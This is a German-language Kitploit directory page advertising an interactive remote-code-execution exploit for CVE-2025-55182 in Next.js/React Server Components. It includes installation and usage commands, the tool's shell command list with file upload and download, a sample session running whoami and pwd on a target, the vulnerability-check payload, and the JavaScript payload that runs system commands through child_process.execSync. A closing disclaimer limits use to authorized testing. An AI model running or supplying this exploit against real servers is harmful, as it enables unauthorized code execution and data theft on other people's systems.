Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-shellinteractive — Interaktiver RCE-Exploit für CVE-2025-55182, der auf die Deserialisierungs-Schwachstelle von Next.js/React-Serverkomponenten abzielt. Bietet automatische Erkennung, Befehlsausführung, Dateiübertragung und eine integrierte Shell mit Verlauf und Autovervollständigung. | Kitploit
Tools/GitHubGitHub/mrr0b0t19/cve-2025-55182-shellinteractive
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubmrr0b0t19/cve-2025-55182-shellinteractive

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182-shellinteractive

Interaktiver RCE-Exploit für CVE-2025-55182, der auf die Deserialisierungs-Schwachstelle von Next.js/React-Serverkomponenten abzielt. Bietet automatische Erkennung, Befehlsausführung, Dateiübertragung und eine integrierte Shell mit Verlauf und Autovervollständigung.

Repository anzeigen
213vor 8 MonatenVon Kitploit geprüft

CVE-2025-55182-shellinteractive

Basis verwendet von: https://github.com/Emiyelbarto/CVE-2025-55182-PoC Vielen Dank für den großartigen Beitrag.

Übersicht

CVE-2025-55182 ist eine Deserialisierungsschwachstelle in Next.js/React Server Components, die es nicht authentifizierten Remote-Angreifern ermöglicht, beliebigen Code auf betroffenen Servern auszuführen. Die Schwachstelle beruht auf einer unsachgemäßen Handhabung serialisierter Daten in React Server Actions.

Hauptfunktionen:

  • ✅ Interaktive Shell mit Befehlsverlauf und Autovervollständigung
  • ✅ Automatische Erkennung der Schwachstelle
  • ✅ Remote-Befehlsausführung
  • ✅ Datei-Upload/Download-Funktionen
  • ✅ Integrierte Testsuite
  • ✅ Konfigurierbare Zielparameter

Installation

Voraussetzungen

  • Python 3.8 oder höher
  • requests-Bibliothek

Schnelle Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/yourusername/hokma.git
cd hokma

# Install dependencies
pip install requests

# Make script executable (optional)
chmod +x hokma.py

Verwendung

Grundlegende Verwendung

root@kitploit:~
# Start interactive shell
python hokma.py

# Check vulnerability only
python hokma.py -u http://target.com --check

# Execute single command
python hokma.py -u http://target.com -c "whoami"

Interactive Shell Commands

root@kitploit:~
help                    Show this help message
set URL <url>          Set target URL
set ID <action_id>     Set action ID (default: user-profile-action)
show                   Show current options
check [url]            Check if target is vulnerable
exploit <command>      Execute command on target
shell                  Start interactive command shell
test                   Run test commands (id, whoami, etc.)
upload <loc> <rem>     Upload local file to target
download <rem> <loc>   Download remote file (base64 encoded)
clear                  Clear screen
exit/quit              Exit the shell

Beispielsitzung

root@kitploit:~
$ python hokma.py

  ____                 _     ____  _          _ _ 
 |  _ \ ___  __ _  ___| |_  / ___|| |__   ___| | |
 | |_) / _ \/ _` |/ __| __| \___ \| '_ \ / _ \ | |
 |  _ <  __/ (_| | (__| |_   ___) | | | |  __/ | |
 |_| \_\___|\__,_|\___|\__| |____/|_| |_|\___|_|_|
                                                  
 React Server Components RCE Exploit (CVE-2025-55182)
Interactive Shell - Type 'help' for commands

hokma> set URL http://vulnerable-app.com
[+] URL set to: http://vulnerable-app.com

hokma> check
[*] Checking vulnerability on target: http://vulnerable-app.com...
[+] TARGET IS VULNERABLE!

hokma> exploit whoami
[*] Executing command: whoami
[*] Server responded with status: 200

--- COMMAND OUTPUT ---
www-data
----------------------

hokma> shell
[*] Starting reverse shell. Use 'exit' to return.
[*] Enter commands to execute on target:
cmd> pwd
[*] Executing command: pwd

--- COMMAND OUTPUT ---
/var/www/html
----------------------
cmd> exit

Konfigurationsoptionen

OptionStandardBeschreibung
Target URLKeineURL der angreifbaren Anwendung
Action IDuser-profile-actionServeraktions-ID als Ziel

Technische Details

Erkennung der Schwachstelle

Das Tool sendet eine speziell konstruierte Multipart-Anfrage, die bei verwundbaren Systemen einen Absturz auslöst:

  • Verwendet die Nutzlast: ["$1:a:a"] mit einem leeren Objekt {}
  • Erkennt die Schwachstelle durch HTTP-500-Antworten oder bestimmte Fehlermuster

Ausnutzungsmechanismus

  1. JavaScript Payload Konstruktion: Erstellt ein Node.js-Skript mit dem Function-Konstruktor
  2. Kindprozess-Ausführung: Verwendet child_process.execSync(), um Systembefehle auszuführen
  3. Antwortextraktion: Erfasst und zeigt die Befehlsausgabe an

Payload-Struktur

root@kitploit:~
const cmd = "COMMAND";
return import('child_process').then(cp => {
    try {
        const output = cp.execSync(cmd).toString();
        return output;
    } catch(e) { 
        return "Command Execution Failed: " + e.message; 
    }
});

Ethische Nutzung & Haftungsausschluss

WICHTIGER RECHTLICHER HINWEIS

Dieses Tool ist vorgesehen für:

  • Autorisierte Sicherheitstests
  • Bildungszwecke
  • Schwachstellenforschung mit entsprechender Einwilligung

Verwenden Sie dieses Tool NICHT gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Unautorisierter Zugriff auf Computersysteme ist illegal und unethisch.

Die Entwickler sind nicht verantwortlich für jeglichen Missbrauch dieses Tools. Benutzer müssen alle geltenden Gesetze einhalten und vor dem Testen die entsprechende Autorisierung einholen.

Bekannte Einschränkungen

  1. Zielanforderungen:

    • Node.js-Server mit React Server Components
    • Anfällig für CVE-2025-55182
    • Kindprozessmodul verfügbar
  2. Erkennungseinschränkungen:

    • Kann falsch positive/negative Ergebnisse liefern
    • Hängt von bestimmten Fehlerantworten ab
  3. Ausnutzungsbeschränkungen:

    • Befehle werden mit den Rechten des Serverprozesses ausgeführt
    • Ausgabe kann in einigen Fällen abgeschnitten werden
    • Komplexe Befehle erfordern möglicherweise spezielles Escaping
Tool herunterladen
Timeout
3 Sekunden
Anfrage-Zeitüberschreitung